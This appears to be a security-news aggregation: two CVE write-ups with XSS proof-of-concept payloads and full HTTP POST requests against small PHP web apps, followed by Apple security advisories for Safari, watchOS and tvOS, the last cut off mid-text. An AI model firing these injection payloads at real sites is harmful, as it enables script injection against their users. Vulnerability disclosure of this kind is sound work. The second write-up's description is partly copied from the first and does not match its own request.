A cross-site scripting (XSS) vulnerability in /admin/add-fee.php of Web-Based Student Clearance System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

**Vulnerability Description**

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the add-fee.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

1.  BUG\_Author: Tr0e
    
2.  vendors: Web-Based Student Clearance System in PHP Free Source Code;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php
    

**Vulnerability Verification**

\[+\] Payload:

"><script>alert(1)</script>

POC：

POST http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 122
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close

cmdsession\=2020%2F2021&cmdfaculty\=Select+faculty&cmddept\=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&txtamt\=2000&btnAdd\=

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author (Log in with the default account and password:admin/admin123) and execute the Payload provided above.

The vulnerability is located at the "Fee Management - Add Fee" function, you shuold inserts Payload when you add new file，as shown in the following figure：

CVE-2022-43078: CVE_Hunter/XSS-2.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /admin/add-fee.php of Train Scheduler App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

**Vulnerability Description**

Train Scheduler App v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the add-fee.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

1.  BUG\_Author: Tr0e
    
2.  vendors: sourcecodester.com;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /train\_scheduler\_app/?id=&code=aaa&name=bbb&destination=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duration=60&eta=30
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert(1)</script\>

POC：

POST http://192.168.0.111:91/train\_scheduler\_app/ HTTP/1.1
Host: 192.168.0.111:91
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/train\_scheduler\_app/
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 92

id\=&code\=aaa&name\=bbb&destination\=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duration\=60&eta\=30

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the Payload provided above.

The vulnerability is located at the "Save Schedule" function, you shuold inserts Payload when you add new file，as shown in the following figure：

CVE-2022-43079: CVE_Hunter/XSS-3.md at main · Tr0e/CVE_Hunter

Apple Security Advisory 2022-10-27-15 - Safari 16.1 addresses code execution, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-15 Additional information for APPLE-SA-2022-10-24-7 Safari 16.1

Safari 16.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213495.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Visiting a malicious website may lead to user interface  
spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243693  
CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 245058  
CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser  
Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University,  
Dohyun Lee (@l33d0hyun) of DNSLab at Korea University

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may disclose  
internal states of the app  
Description: A correctness issue in the JIT was addressed with  
improved checks.  
WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab  
Entry added October 27, 2022

WebKit PDF  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 242781  
CVE-2022-32922: Yonghwi Jin (@jinmo123) at Theori working with Trend  
Micro Zero Day Initiative

Additional recognition

WebKit  
We would like to acknowledge Maddie Stone of Google Project Zero,  
Narendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an  
anonymous researcher for their assistance.

Safari 16.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKowACgkQ4RjMIDke  
NxlhOg/+I94LgMI7No4xw6dub1rdzNTbMV6A0R14HXwA7PoMzXgXJotYFyAfGUY4  
zd2fE9ixEuXqt+OsVrQ0/ZU4HcLEJLQk2ZkULoDfNeGiuJpi6k9VhPp6995XtLNb  
zGZgMu5dOPBkYsSaM5XaVwLQPtsIbac3u/Uoo6l2TyyN1B2clsI1dS2IXS8DEHkr  
2fCImTAcFfqIW7TZ6xqAdYOL5QLoJ8qXTcjSMaWtPpPzkfpZCTTwV8ifauK5rTQd  
JsFf49RFWMNdZ3qHNRaENsFMh1Y+bMRIW6Xt41WKXhSPdNXonv93N472YGhMtt7Z  
k+IuibGRVlwzc5Ri4AnQspBjhint6vo4vbJ39h1FoSzqTm3PruH+HGrhlfMTGR8/  
0s/QDBLQbA+UlM5r6uinQ5pI771rRyHTCWOxLUVVopDOV9ImV36Y+INakc3pTXL1  
420Wg31lCMO3cwwXyVYq/zDbCpJ2gDptSWTqlubli+omxMG7LRs0Vn9P4NTosVzk  
jN49FHJE2moD8O0D+sia6+lhyVhcP8UIA3WtcXegVngrwL6sAoFa5SCp49wmbb/O  
Ye1eysxuMR2xu7piVbUpGh0wRY50MbwwSWX0vRt0CwxcoiQK90lQFbqy2RFX4eN8  
k/jjh3nPUl20WxgOfQfLfiY/9aPcQSzvcOzba2bSovdgyk8xH+o=  
=3IzG  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-15

Apple Security Advisory 2022-10-27-14 - Safari 16 addresses buffer overflow, code execution, out of bounds read, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-14 Additional information for APPLE-SA-2022-09-12-5 Safari 16

Safari 16 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213442.

Safari Extensions  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track users through Safari web  
extensions  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617 and an anonymous researcher  
Entry updated October 27, 2022

WebKit Sandboxing  
Available for: macOS Big Sur and macOS Monterey  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with improvements to the  
sandbox.  
WebKit Bugzilla: 243181  
CVE-2022-32892: @18楼梦想改造家 and @jq0904 of DBAppSecurity's WeBin lab  
Entry added October 27, 2022

Safari 16 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKowACgkQ4RjMIDke  
NxlCEg/+KnbktSos4M/gMt7rkcCymB4Ul4mMw0XW6eJVBL34H3XiOM9i8OoRGbg2  
F3Ft4mxRWFlzA9SgNVuvMBVHREkOdeOJ37PDtfZp9bITGAtOww8K8Ng56VxhpPem  
gs5q+veUTu95cVXDfGebwQNYtXc76+Zg/+Ju9VmhFJg0XXrjC2mzAEC8Mz2yy91b  
9otf+UeDmdBUF3eLrygVAwtXE0/swZVaRMeDu2EYFuJWl/afN+ICOrHYLxtLa9dB  
1uvw+RbOhwFRdKB010tcUUhf+M06Tp6pHPvtWHdS+Xy3RxA1d4rMzdon4TmsdEdr  
dBpOiu0EOFLMXekVosIkkvKLXAWwH5C1Ogap7IchXnc8c+rEm6Hl1QuoH4QL0krD  
P+sGYV4457e+VASkaUDEr6yxXJj+8MILm4x+7akD767qhoKvzpIfrFKY2gMnWkvK  
JNUMzPXCYLkht39KWGEJk/b/HMvlwniBmXKGDVaTG/oNcMVFyRvx81qxrNlELxcw  
lYSfP5tICA0CBWyVXYvUy1JRe15QrelLmCwpcAvAz1Edqu90sAAsPybvrPJHcZxD  
2O+parML2rVJ6zOVBg1cOddohgnJEbT3PzDW48HRV8Ub5I8WzvIKqnS+R7VWkh66  
Av8d8ElI37WY2sfIsFwXvhsIYFLZL86nel5HVEflmog2K0g/Kd0=  
=lLIK  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-14

Apple Security Advisory 2022-10-27-13 - watchOS 9 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-13 watchOS 9

watchOS 9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213486.

Accelerate Framework  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
CVE-2022-42795: ryuzaki

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio  
Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research  
s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee__)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32858: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32898: Mohamed Ghannam (@_simo36)  
CVE-2022-32899: Mohamed Ghannam (@_simo36)  
CVE-2022-32889: Mohamed Ghannam (@_simo36)

Contacts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed with improved checks.  
CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

Exchange  
Available for: Apple Watch Series 4 and later  
Impact: A user in a privileged network position may be able to  
intercept mail credentials  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32928: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32903: an anonymous researcher

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: A denial-of-service issue was addressed with improved  
validation.  
CVE-2022-1622

Image Processing  
Available for: Apple Watch Series 4 and later  
Impact: A sandboxed app may be able to determine which app is  
currently using the camera  
Description: The issue was addressed with additional restrictions on  
the observability of app states.  
CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)  
CVE-2022-32911: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32914: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32894: an anonymous researcher

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32883: Ron Masas of breakpointhq.com

MediaLibrary  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-32908: an anonymous researcher

Notifications  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to access  
contacts from the lock screen  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32879: Ubeydullah Sümer

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to use  
Siri to obtain some call history information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32870: Andrew Goldberg of The McCombs School of Business,  
The University of Texas at Austin (linkedin.com/in/andrew-goldberg-/)

SQLite  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause a denial-of-service  
Description: This issue was addressed with improved checks.  
CVE-2021-36690

Watch app  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read a persistent device identifier  
Description: This issue was addressed with improved entitlements.  
CVE-2022-32835: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32875: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472),  
xmzyshypnc(@xmzyshypnc1)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617, an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Wi-Fi  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32925: Wang Yu of Cyberserval

Additional recognition

AppleCredentialManager  
We would like to acknowledge @jonathandata1 for their assistance.

FaceTime  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge an anonymous researcher for their  
assistance.

Mail  
We would like to acknowledge an anonymous researcher for their  
assistance.

Sandbox  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

UIKit  
We would like to acknowledge Aleczander Ewing for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpMACgkQ4RjMIDke  
Nxmucg/+L8XHGSij8F6IoUuvCuJ3u1IUfHXE5LK0BafEddVzKS87fct6KP7L3kvE  
SfdJVCOrmfVImKn3etfpDgwgZoYqF8cxeb9PO7ObVT/15GBBfuAGc+rNZ3oAeWDJ  
iYFiiWZrDnj9gz6bo0jn4dN9q8/X9iIjUCujPdkrFzXqa+KkVub9wv6/jtJGQA3O  
YgDIaV0UvcJss0uhJR9GX+A3+4zeJgUiNq2a/1qf1nOFh/O59pbHNWYnHzB91/FE  
8V+EJgfxaK/M3zDfonPI9SMa26lO+VJejOnco98of7Kk+yNoOy6xTIkBLLBURMqN  
Jxz0I3WNxjM5TQ61WzINvd198gqjyac2nVg1S4Gqkekk6VXwmQR5zaqQmzePQqp3  
qw+qhICNqFSUJPyIDQwnuCaf1MlfEj57ustS5d8g5M1fNXBlnrtJVpI/CcPIAYvo  
7pQZy/6QptmrPp6Lgv6k/Vtxi/H5s8/tHCnhtvczbdpH6lsPmCJlDSdzsK1L8krP  
82WcjBulywZWfZ4IBNi52lD+EWlmzHomcYVGQcbd0/1FLE8h5meKCvYxM5ovfk1F  
PloJY8FQgJ3b+NcTQuTD4dZ7rc+Le5WqqD4EAgYbOKgAD6Fqy47eY8yNcYJw0qXP  
5jll4mfHUJe7NHc9frZKrdpH0Cl8o9lRdRPpM+kLqteQlpNOjao=  
=Ty+V  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-13

Apple Security Advisory 2022-10-27-12 - watchOS 9.1 addresses code execution, out of bounds write, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-12 Additional information for APPLE-SA-2022-10-24-5 watchOS 9.1

watchOS 9.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213491.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to modify protected parts of the file  
system  
Description: This issue was addressed by removing additional  
entitlements.  
CVE-2022-42825: Mickey Jin (@patch1t)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges   
Description: The issue was addressed with improved memory handling.   
CVE-2022-32932: Mohamed Ghannam (@_simo36)  
Entry added October 27, 2022

Audio  
Available for: Apple Watch Series 4 and later  
Impact: Parsing a maliciously crafted audio file may lead to  
disclosure of user information   
Description: The issue was addressed with improved memory handling.   
CVE-2022-42798: Anonymous working with Trend Micro Zero Day  
Initiative  
Entry added October 27, 2022

AVEVideoEncoder  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32940: ABC Research s.r.o.

CFNetwork  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted certificate may lead to  
arbitrary code execution  
Description: A certificate validation issue existed in the handling  
of WKWebView. This issue was addressed with improved validation.  
CVE-2022-42813: Jonathan Zhang of Open Computing Facility  
(ocf.berkeley.edu)

GPU Drivers  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32947: Asahi Lina (@LinaAsahi)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32924: Ian Beer of Google Project Zero

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause kernel code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-42808: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
state management.   
CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai  
Entry added October 27, 2022

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges   
Description: A race condition was addressed with improved locking.   
CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)  
Entry added October 27, 2022

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges   
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai  
Entry added October 27, 2022

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges   
Description: A logic issue was addressed with improved checks.   
CVE-2022-42801: Ian Beer of Google Project Zero  
Entry added October 27, 2022

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a maliciously crafted website may leak sensitive  
data   
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois  
at Chicago; Binoy Chitale, MS student, Stony Brook University;  
Mohammad Ghasemisharif, PhD Candidate, University of Illinois at  
Chicago; Chris Kanich, Associate Professor, University of Illinois at  
Chicago  
Entry added October 27, 2022

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2022-42811: Justin Bui (@slyd0g) of Snowflake

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a malicious website may lead to user interface  
spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243693  
CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 245058  
CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser  
Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University,  
Dohyun Lee (@l33d0hyun) of DNSLab at Korea University

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may disclose  
internal states of the app   
Description: A correctness issue in the JIT was addressed with  
improved checks.  
WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab  
Entry added October 27, 2022

zlib  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to cause unexpected app termination or  
arbitrary code execution   
Description: This issue was addressed with improved checks.  
CVE-2022-37434: Evgeny Legerov  
CVE-2022-42800: Evgeny Legerov  
Entry added October 27, 2022

Additional recognition

iCloud  
We would like to acknowledge Tim Michaud (@TimGMichaud) of  
Moveworks.ai for their assistance.

Kernel  
We would like to acknowledge Peter Nguyen of STAR Labs, Tim Michaud  
(@TimGMichaud) of Moveworks.ai, Tommy Muir (@Muirey03) for their  
assistance.

WebKit  
We would like to acknowledge Maddie Stone of Google Project Zero,  
Narendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an  
anonymous researcher for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpQACgkQ4RjMIDke  
NxndmQ/9FlBich1M+naXLmjo/AyBTdlmBdFUH6cU92PspO7vrzTZl3Gl3dSjvGg0  
TU7AGeAAvr278Zra0Hrm+D+w2BMAd3SSIjBXyum02lx0AGyyAFaPEDVq4CpxnqUG  
AEqBRrgoU9yZpTrIQXZlsnqphdv3KLVDzqqKlZjkPzIboYJ0I0c0HMP54618kx1n  
oBtoEEjPrIhH9LJyt37FbtgRntCzuuyistaxKGugZo4UDUt8hkHLKpYHf/5BNfWl  
/SaX1sy1ZJBoOezMC7/egaHPBbJRDnU3dXSQ7ON7h6w1Tc9NeUjXP0wf8BByeIko  
zJF5StfqfBKa3fR8wl0uM4CWDuHVtVjHAv5lWSqEQoEFoAjud+Ajjr5j3DJegVW7  
Xp5Xu7W2XRR03dCM/SCQXMttr/Eu7z4EPJZD1W5y/UYH+ZwF4tq+4fxdrLOzPh4j  
uDLW+CWvF0d/+lVINDXzvzfQwEk77fbFJtUwL6Z5Sq95rtIL0/1OgtK/F/ODeyAX  
8xYDCVdbn84K0/5K58NsvLS01XKXGISVY5yWrf3R7f69AVq7aiaaREY71pkuIwKf  
+aGpuOJibybGZqIOedMES/FCYuUqZF/0N7TJH8LpmlYt/T+fXjeJkupdeT+2vpcX  
iq3rTxsee+WgHhuR/3utIdIFZwVvgZBOadtHO6vIOQ1ce1QyLqI=  
=ZTUZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-12

Apple Security Advisory 2022-10-27-11 - tvOS 16 addresses buffer overflow, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-10-27-11 tvOS 16tvOS 16 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213487.Accelerate FrameworkAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted image may lead to arbitrarycode executionDescription: A memory consumption issue was addressed with improvedmemory handling.CVE-2022-42795: ryuzakiAppleAVDAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: This issue was addressed with improved checks.CVE-2022-32907: Natalie Silvanovich of Google Project Zero, AntonioZekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Researchs.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee__)GPU DriversAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-32903: an anonymous researcherImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing an image 